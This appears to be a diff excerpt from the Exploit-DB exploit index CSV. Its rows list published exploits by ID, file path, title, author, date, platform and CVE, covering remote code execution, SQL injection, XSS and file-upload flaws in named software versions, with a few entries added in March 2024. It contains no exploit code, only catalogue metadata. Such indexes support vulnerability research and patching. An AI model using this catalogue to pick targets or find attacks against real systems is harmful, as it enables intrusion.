51879,exploits/multiple/webapps/51879.py,"OSGi v3.7.2 (and below) Console - RCE",2024-03-12,"Andrzej Olchawa_ Milenko Starcik",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
51878,exploits/multiple/webapps/51878.py,"OSGi v3.8-3.18 Console - RCE",2024-03-12,"Andrzej Olchawa_ Milenko Starcik",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
24922,exploits/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",webapps,multiple,,2013-04-08,2013-04-08,1,CVE-2013-2637;OSVDB-92086,,,,,
32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/
37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494
@ -12210,6 +12214,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,
49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,,2021-02-08,2021-02-08,0,,,,,,
49829,exploits/multiple/webapps/49829.js,"SnipCommand 0.1.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
51883,exploits/multiple/webapps/51883.txt,"SnipeIT 6.2.1 - Stored Cross Site Scripting",2024-03-12,"Shahzaib Ali Khan",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
43445,exploits/multiple/webapps/43445.txt,"Snitz Forums 2000 < 3.4.0.3 - Multiple Vulnerabilities",2003-06-16,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00010,,,,,http://gulftech.org/advisories/Snitz%20Forums%202000%20Multiple%20Vulnerabilities/10
48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,,
@ -15830,6 +15835,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12500,exploits/php/webapps/12500.txt,"Clicksor - SQL Injection",2010-05-04,JM511,webapps,php,,2010-05-03,,1,,,,,,
21454,exploits/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,webapps,php,,2002-05-12,2012-09-22,1,OSVDB-86919,,,,,https://www.securityfocus.com/bid/4756/info
51135,exploits/php/webapps/51135.txt,"ClicShopping v3.402 - Cross-Site Scripting (XSS)",2023-03-30,nu11secur1ty,webapps,php,,2023-03-30,2023-03-30,0,,,,,,
51880,exploits/php/webapps/51880.txt,"Client Details System 1.0 - SQL Injection",2024-03-12,"Hamdi Sevben",webapps,php,,2024-03-12,2024-03-12,0,,,,,,
41287,exploits/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php,,2017-02-09,2017-02-09,0,,,,,,
48956,exploits/php/webapps/48956.txt,"Client Management System 1.0 - 'searchdata' SQL injection",2020-10-27,"Serkan Sancar",webapps,php,,2020-10-27,2020-10-27,0,,,,,,
50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,,2021-08-04,2021-08-04,0,,,,,,
@ -19721,6 +19727,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info
49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,,
49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,,
51877,exploits/php/webapps/51877.txt,"Human Resource Management System 1.0 - 'employeeid' SQL Injection",2024-03-12,Srikar,webapps,php,,2024-03-12,2024-03-12,0,,,,,,
51125,exploits/php/webapps/51125.txt,"Human Resource Management System 1.0 - SQL Injection (unauthenticated)",2023-03-29,"Matthijs van der Vaart (eMVee)",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,

Can't render this file because it is too large.